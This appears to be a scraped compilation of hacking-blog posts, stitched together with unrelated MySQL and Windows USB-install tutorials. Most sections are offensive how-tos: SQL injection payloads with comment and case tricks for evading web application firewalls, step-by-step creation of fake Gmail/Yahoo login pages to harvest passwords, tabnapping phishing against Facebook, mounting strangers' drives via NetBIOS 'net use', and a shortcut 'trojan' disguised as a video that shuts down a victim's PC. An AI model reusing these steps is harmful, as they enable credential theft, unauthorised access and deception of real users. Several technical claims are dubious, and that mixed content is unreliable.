SQL Injection Filter Evasion Part 1

In this tutorial I will explain you some of the basics of SQL Injection filter Evasion, This is the first part of the two of the articles I will post on SQL Injection filter evasion and bypassing,  In this post I am not gonna teach you Basics of SQL injection, I will assume that you already know them, because cmon every one talks about it, you will find tons and tons of posts on forums related to basics of SQL Injection, In this post I will talk about common methods of used by hackers and pentesters for evading IDS, IPS, WAF's such as Modsecurity, dotdefender etc.

WebApplication Firewalls:

 

According to webappsec "Web Application Firewall (WAF): An intermediary device, sitting between a web-clientand a web server, analyzing OSI Layer-7 messages for violations in the programmedsecurity policy. A web application firewall is used as a security device protecting theweb server from attack."

Almost all Webapplication firewalls and IDS use Signature based protection, where they are looking of common inputs such as "'Or 1=1", "Or x=x" etc. But in my opinion webapplication firewalls are only good for detecting automated tools and script kiddies. However if the tool you are using for attacking a SQL Injection vulnerable database is an open source such as SQLMAP, You can easily modify it to evade a webapplication firewall.

Detecting A WAF:

Before learning about bypassing the WAF, You must know how to detect a Webapplication firewall. There are numerous methods of detecting if the target website is using a Webapplication firewall.

Prompt Message:

1. If you are attacking a website and you get an error like "Hacking attempt detected" or "Page not found", you are up against a WAF.

Cookies:

The most common method of detecting a webapplication firewall is by capturing the http:// request, Lots of WAF's add their own cookie in the HTTP communication.

Here is a live brazilian website using WAF, The cookie value "WAT" shows that the target host is using a WAF:

        GET /news.asp?PageId=254 HTTP/1.1Host: www.poupex.com.brUser-Agent: Mozilla/5.0        (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.12)Accept: image/png,*/*;q=0.5Accept-Encoding: gzip,deflateKeep-Alive: 300Proxy-Connection: keep-aliveReferer: http://www.SomeSite.comCookie:ASPSESSIONCWKSPSVLTF=OUESYHFAPQLFMNBTKJHGQGXM;ns_af=xL9sPs2RIJMF5GhtbxSnol+xU0uSx;ns_af_.SomeSite.com_%2F_wat=KXMhOJ7DvSHNDkBAHDwMSNsFHMSFHEmSr?nmEkaen19mlrwBio1/lsrzV810C&

Dotdefender:

If you are up against a Dotdefender you will get the following error message:

Observing HTTP Response:

If you see a similar http response whenever you make a malicious http request, you are probably up against a MOD secuirty WAF.

HTTP/1.1 501 Method Not ImplementedDate: Fri, 27 Jun 2008 23:30:54 GMTAllow: TRACEContent-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1http://ws.

WEBAPPLICATION Firewall Evasion:

There are tons and tone of methods to evade a webapplication firewall, Here is some of them:

1. Comments.
2. Changing Cases.
3. Encoding.

And much more.

Example of a sample IDS and WAF Signature:

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection attempt detected, Your IP has been logged”;

flow: to_server, established; content: “' or 1=1 --”; nocase; sid: 1; rev:1;

The above signature is telling WAF that if the attackers inputs the following content into the webpage "' OR 1=1" display the message "SQL Injection attempt detected, Your IP has been logged".

Bypassing The Signature:

Such poorly written signatures can be easily bypassed.  Think for a second what if the attacker inputs ' OR 2=2, Isn't 2=2, How about OR 3=3 and so on. So such poorly written signatures are good for nothing.  You can also add comments in order to bypass more complex signatures, e.g OR 2/**/=/**/2.

Comments:

Comments are one of the most easiest ways to defeat a WAF, As lots of signatures are not looking for the comments they are just looking for the malicious keywords.

Union statement against a WAF without comments:

www.site.com/a.php?id=123 union select 1,2,3,4,5-- BLOCKED

Union statement against a WAF with comments:

www.site.com/a.php?id=123 union/*We are bypassing the WAF*/select/*Rafay Hacking Artcles*/1,2,3,4,5-- ALLOWED

Changing Cases:

Some WAF's don't have any rule or signatures to detect upper cases, Here are some examples of a union statement with Uppercase.

uNiOn aLl sElEcT 

UnIoN aLL SELECT

You can combine uppercase statements with comments for more better results:

www.site.com/a.php?id=123 uNiOn All sEleCt/*We are bypassing the WAF*/select/*Rafay Hacking Artcles*/1,2,3,4,5--

Well I hope you have liked this post, In this post we talked about detecting a WAF and some basic techniques on evading a webapplication firewall, However in the next post we will look at some more advanced techniques such as encoding, whitespaces etc to bypass a webapplication firewall.

Source:- www.rafayhackingarticles.net

How to create Fake login page for any website

A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.

So in this post i will show method to create Fake login page for desired site:


How to create fake login page - Procedure?


Now it's easy to build a Fake Login Pages without any knowledge of Programming Languages. One can use http://www.jotform.com to build the Sign Up page.


{1} Open www.jotform.com and Sign Up.
{2} then Login there with your newly registered account.
{3} now click on ‘ Create your first form’.
{4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.)
{5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)
{6} Now Click on ‘Power Tool’ Option (In right hand side…)
{7} Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’
{8} Now Click on ‘Properties’ Option (In right hand side…). These are the form properties.
{9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.
{10} Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don’t leave it blank…)
{11} Now Click on ‘Save’. After saving, click on ‘Source’ Option.
{12} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of ‘Option2′.
{13} Now open Notepad text editor and write the following code their.
Paste the Option2 code here
{14} And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it.
Now you can view it by typing the url in the address bar.


NOTE: If u want to send it to the internet, then first you will have to create a hosting account which you can create on www.110mb.com and there are many other sites which you can find on the internet very easily.
I suppose that you created your account at 110mb.com
now login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done.
Now you can access you file on the net by just typing the url of the file.
And you will receive password of the users that login to your site through email-id which you’ve entered while creating the form.


Source:- www.rafayhackingarticles.net  

Netbios Hacking

 

THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER. NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.

STEP-BY-STEP NETBIOS HACKING PROCEDURE

1.Open command prompt

2. In the command prompt use the “net view” command
( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS. BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).

                                   Example: C:\>net view \\219.64.55.112

The above is an example for operation using command prompt. “net view” is one of the netbios command to view the shared resources of the remote computer. Here “219.64.55.112? is an IP address of remote computer that is to be hacked through Netbios. You have to substitute a vlaid IP address in it’s place. If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown. If not an error message is displayed. So repeat the procedure 2 with a different IP address.

3. After succeeding, use the “net use” command in the command prompt. The “net use” is another netbios command which makes it possible to hack remote drives or printers.
                                             Example-1:
                                             C:\>net use D: \\219.64.55.112\F
                                             Example-2:
                                             C:\>net use G: \\219.64.55.112\SharedDocs
                                             Example-3:
                                             C:\>net use I: \\219.64.55.112\Myprint
 

   NOTE: In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.

NOTE: GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES, FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER. THAT IS, IF YOU HAVE C: & D: AS HARD DIRVES, A: AS FLOPPY DRIVE. AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT
F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer. These are displayed after giving “net use” command. “219.64.55.112? is the IP address of remote computer that you want to hack.

4. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.

Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name. You can open it and access remote computer’s Hard-Drive. You can copy files, music, folders etc. from victim’s hard-drive. You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system. You can access files/folders quickly through “Command Prompt”.

NOTE: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios. That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed). So Repeat The Procedure 2,3 With Different IP Address.

Source:- www.gohacking.com 

Facebook Hacking by Tabnapping

Today i will teach you how to hack Facebook account password using Tabnapping. Tabnapping is a modern type of phishing method used to hack websites passwords. As we all know normal Phishing attack is easily detectable on Facebook because Facebook has implemented an extra code that validates the previous arriving URL and some basic functions. If it founds that page from which you arrived is a Facebook Phish or fake page, it displays a warning message to user that You have been arrived from fraudulent or fake page. So please change you Facebook account password immediately. So user easily came to know that was made lol by someone and he changes his password again. So overall the hacking attempt is failed.
Ahhaha... The old Phishing methods are for novice users who are just script kiddie's and doesn't ABC of hacking.. As technology is changing, to survive as hacker you also need to change your hacking techniques with time. And key to this is coding and language knowledge.

What is Tabnapping and what advantage it provides over phishing ?

As i already told friends, tabnapping is modern phishing technology that hacking experts to hack victims passwords. Tabnapping is same as Phishing, the only difference between them is Phishing redirects you to particular page while Tabnapping uses the meta refresh feature of web browsers to refresh the page after particular delay (delay is set by user). Meta refresh is just a meta tag that is used in header part of web pages for sending traffic from a source to destination website after few seconds delay depending upon setting. Since its a meta tag so its only processed but no data in cookies is stored. Here the advantage lies, when Facebook checks for the previous page or source from which we are arriving at Facebook, it founds none as we are dynamically refreshing the page which acts similar like we are opening a Facebook page in new tab. Now Facebook recognizes this as user intentionally opened Facebook and he hasn't arrived there through an script or automatic program. So we tab nabbed Facebook from the back end using the meta refresh tag.
Requirements:

1.     Phishing Pages   
2.     Register on My3gb website and upload these to them.
3.     Send the link to victim.

How to hack Facebook account password using Tabnapping:

This technique hardly requires less than 5 minutes to hack the Facebook account password.This is the first version of this hack. I will tell you the improvement in this technique in further tutorials. Follow these Steps...

1.     Download Phishing Pages 
2.     Unzip the folder ,these are total four files.
3.     Now Register on my3gb website and upload these to them.
4.     Now open the index file and send its link to victim.
5.     Check the password file to get the password of victim.

The only thing i not included in this tutorial is How to send Phishing emails. You all know the reason for this, we cannot discuss such things directly on internet because that can be misused by newbies and i don't want that anybody should use my tutorials for wrong way. I write blogs just to guide you how hackers do the things. My intention is to guide you latest things happening in security field and not to make you a cracker.
So Enjoy the tutorial and learn how tabnapping is done...

www.gohacking.com

Facebook Hacking With 007 facebook Hacker

007 Facebook hack v 1.0 is a special program designed to break into Facebook username and password. The software with a capacity of 11.8 MB.

Here are the steps to run:

1. Download Facebook Hack

2. Desktop.rar file Ekstrack and run 007_facebook_hack_v_10.exe

3. Press the ENTER button and enter the password. Password on a password.txt file in the package of desktop.rar file.

4. If the above steps correctly, we'll go to the main page of hacking. Then press the Settings button

5. In the server box, enter www.facebook.com

6. In the HTTP Proxy field, fill in the proxy address. Use a bypass proxy address. So, we can make hacking as if from overseas servers. To search the proxy, visit http://www.aliveproxy.com/, then select a list of existing State. To find out the proxy that we can still in active conditions, change the proxy settings on your browser and point the browser to http://www.cmyip.com/. If the proxy address may appear, it means that the proxy can be used.

7. Press the Connect button until the indicator on the right side of the green fields.

8. Press the Back button, then enter the user ID(Profile ID) of a victim account.

To be Success in this penetration by using this software is dependent on our internet connection speed. Try also to replace IP Proxy to find the appropriate address. There are colleagues who claim to successful penetration and also claiming to always fail.

Facebook administrator has so far been updating his security system by applying a dynamic proxy system that can filter out proxy address that will go into the data server. For that, this hack facebook software works like a chase each other with facebook security system.


This program also has viruses and facebook fake login page. Be careful using this program and do not use it for illegal activity. Good luck!!
 And This is Fake Software which inject malware in ur PC.......In all over world there is no software which is able to hack fb id........

How to Create a MySQL Database?

How to Create a MySQL Database?

Please note that you can not create a database directly through cPanel->PhpMyAdmin due to the lack of user privileges. However, you can easily create a new database from your cPanel->MySQL Databases. Navigate to the Create New Database box. Enter the database name in the New Database text field and click on the Create Database button.

The database name will be preceded by the cPanel username. For example, if your cPanel user name is user and you want to have a database named test, the actual database name will be user_test. You will get a confirmation message.

How to Add MySQL Database Tables?

Navigate to your cPanel->PhpMyAdmin tool and open the newly create database. It is empty and there are no tables.

Enter the table name and the number of fields. Click on the Go button to create the table.

On the next screen you should enter the fields' names and the corresponding properties. The properties are:
Type

Here you should pick the type of the data, which will be stored in the corresponding field. More details about the possible choices can be found in the official MySQL Data Types documentation.
Length/Values

Here you should enter the length of the field.  If the field type is "enum" or "set", enter the values using the following format: 'a','b','c'...
Collation

Pick the data collation for each of the fields.
Attributes

The possible attributes' choices are:

BINARY - the collation for the field will be binary, for example utf8_bin;

UNSIGNED -  the field numeric values will be positive or 0;

UNSIGNED ZEROFILL - the field numeric values will be positive or 0 and leading zeros will be added to a number;

ON UPDATE CURRENT_TIMESTAMP - the value for a data type field has the current timestamp as its default value, and is automatically updated;
Null
Here you define whether the field value can be NULL. More about the NULL value can be found in the corresponding MySQL documentation.
Default

This property allows you to set the default value for the field.
Extra

In the Extra property you can define whether the field value is auto-increment.

The radio buttons that come below define whether there is an Index defined for the particular field and specify the Index type.
Comments

Here you can add comments, which will be included in the database sql code.

At the end you can include Table comments and pick the MySQL Storage Engine and the Collation. Once you are ready, click on the Save button.

If you want to add more fields you should specify their number and click on the Go button instead of Save.

The database table will be created and you will see the corresponding MySQL query.

Now we will proceed with the populating of the table with data.

How to Add Content in a Database Table?

In order to add records in a database table click on the Insert tab.

 

Enter the data in the corresponding fields and click on the Go button to store it.

At the bottom of the page you will see a drop-down menu labelled Restart insertion with x rows . There you can pick the number of the rows that you can populate with data and insert at once. By default the value is 2.

The Ignore check box will allow you to ignore the data entered below it. It will not be added.

You can see the newly inserted record by clicking on the Browse tab.

You can edit or delete the record by clicking on the corresponding icons.

To insert more records, return to the Insert tab and repeat the procedure.

How to Backup a Database?

Once you are ready, you can create a backup of your database through the Export tab.

 

Select the tables which you want to be exported.

Leave the radio button selection to the SQL option.  The Structure and the Data check boxes should remain checked.

Select the Save as file check box and then click on the Go button.

In this way you will save the dump SQL file with your database structure and content on your local computer.

If you have a large database with a lot of records, the server timeout value can be reached. In such a case you can export the database in several batches. You can find more details in our MySQL Knowledge Base.

How to Restore a Database Backup?

You can restore your database backup from the Import tab.

Click on the Browse button to select your database backup file from your local computer.

Pick the charset of the file from the corresponding drop-down menu.

If the file is too big, the MySQL server timeout can be reached. In such a case you can interrupt the import action. Then you can continue with the data import defining the number of the queries to be skipped from the file beginning. In this way you will skip the imported queries and continue from the point of the interruption.

Additionally you can pick the SQL compatibility mode of the imported file. You can find more details in the Server SQL Modes documentation.


 ©www.siteground.com

How to Make A Trojen Virus in Less than 3 Minutes

This Post Help you to make a Simple Virus ........

Step 1- Make new Shortcut on Desktop

Step 2- Type Location of item shutdown -s -t 30 "Trojen Virus Activated".

Note:-  30 is the time in second,you type your choice time to shutdown the computer.

Step 3- Name the file whatever you are posing it as(Ex NFS MW).If you are telling you're victim it's a video,name it:"Funniest Event Ever!",or something convincing.

Congrats your virus is now done.If you want to make it EXTREMELY convincing in 20 seconds.
 Thanx for sticking with us.Now, no one's going to click on the virus if it doesn't look the part.    

 So, pick the appropriate icon that corrosponds to the title of the Virus.

And Last but least it is simple virus to shutdown the pc in given Time,but it is helpful for Beginners.
Post UR Problem......
©www.hackvirus.blogspot.com

How to Install Windows 7 From a USB Drive/Flash Drive

Installing Windows from a USB flash drive has several advantages – First of all, the overall speed of the installation process will increase significantly, carrying a USB stick is much more convenient than a DVD, and finally it becomes possible to install the OS even on those systems that do not have a DVD drive, such as a netbook/PC.

In this Blog, I will show you how to load the Windows installation on to your USB flash drive and make it bootable just like the DVD/CD.

Tools Required:

1. USB flash drive with a minimum capacity of 4 GB.

2. Windows 7 set-up DVD(Any Version).

Step-1: Plug-in your USB flash drive and backup all the existing data in it by Back & Restore or by Copying.

Step-2: Open the command prompt. If you are using Windows 7/Vista then open it with administrator rights*.

     * Goto Start -> All Programs -> Accessories -> Right-click on “Command Prompt” and select “Run as Administrator”.

Step 3: In the command prompt, type in the following command:

                           DISKPART

Now issue the following command:

                                                     LIST DISK

This will show you a list of  available disks on your system. Disk 0 is usually the hard disk. In my case, Disk 5 is the USB drive (this can be a different one in your case). Now issue the command as shown below:

                                                                                       SELECT DISK 1

NOTE: In the above command, 1 is the USB drive number on my system. 

If you have a different number on your system, 

then you need to replace 1 with that number. 

Step-4: Now issue the following list of commands one by one as shown below:

                     CLEAN

                                                        CREATE PARTITION PRIMARY

                                                        SELECT PARTITION 1

                                                        ACTIVE

                                                        FORMAT FS=NTFS QUICK

                                                        ASSIGN

                                                        EXIT

Minimize the command prompt and proceed to the next step.

                                 

        

OR YOU CAN ALSO MAKE PEN DRIVE BOOT ABLE BY FORMATTING AND CONVERTS ITS TYPE, FAT/FAT32 TO NTFS

Step 5: Insert the Windows 7/Vista installation disc and note down the “drive letter” of your DVD drive. In my case, it is “H:”. Now type the following list of commands as shown below:

                                                                H: CD BOOT


                                                               CD BOOT


                                        BOOTSECT.EXE /NT60 H:(NOTE: H: is your USB drive letter)


                                                               EXIT 

 

Step-6: Copy the contents of your Windows 7/Vista installation disk into the USB flash drive.

That’s it! Your USB stick is now ready to boot and install the OS for you. Don’t forget to enable the “USB Boot” option and change the “boot priority to USB device from hard disk” in your BIOS settings.

Note:-DISKPART command not works in Window XP.

I Hope this Blog is beneficial for you,post ur comment/problem.......
Source www.gohacking.com

Computers Password Hacking

If u lost your administrator password,it is a huge problem which occurs in our daily life,

so how to know the password of our/victim PC password,this blog helps you to unlock Ur PC with the help of Registry Editing software which was stored in USB/Pen drive.

1.Download Windows Registry Editing Software.(Download it from http://pogostick.net/~pnh/ntpasswd/)

2. Copy all files from this CD onto the USB drive.
   It cannot be in a sub directory on the drive.
   You do not need delete files already on the drive.

3. Install the boot loader (you may have to be administrator)
   On the USB drive, there should now be a file "syslinux.exe".

  Open command Prompt,

   Run this from a command line, like this:

    h:\syslinux.exe -ma j:

replace h with some other letter if your USB drive is on another

drive letter than j:

On some drives, you may have to change the -ma option if you

get an error.

If it says nothing, it probably did install the boot loader.

Welcome Screen of Software on start up

***************************************************************************

*                                                                         *

*         Windows Change Password / Registry Editor / Boot CD             *

*                                                                         *

*  (c) 1998-2011 Petter Nordahl-Hagen. Distributed under GNU GPL v2       *

*                                                                         *

* DISCLAIMER: THIS SOFTWARE COMES WITH ABSOLUTELY NO WARRANTIES!          *

*             THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE       *

*             CAUSED BY THE (MIS)USE OF THIS SOFTWARE                     *

*                                                                         *

* More info at: http://pogostick.net/~pnh/ntpasswd/                       *

* Email       : pnh@pogostick.net                                         *

***************************************************************************

Please note that you may have to adjust settings in your computers BIOS
setup to boot from USB.

Also, some BIOS (often older machines) simply won't boot from USB anyway.
Unfortunately, there are extremely many different versions of BIOS,
and a lot of them are rather buggy when it comes to booting off different
media, so I am unable to help you.

For Help,Mail me or Post the Question.....
©www.hackvirus.blogspot.in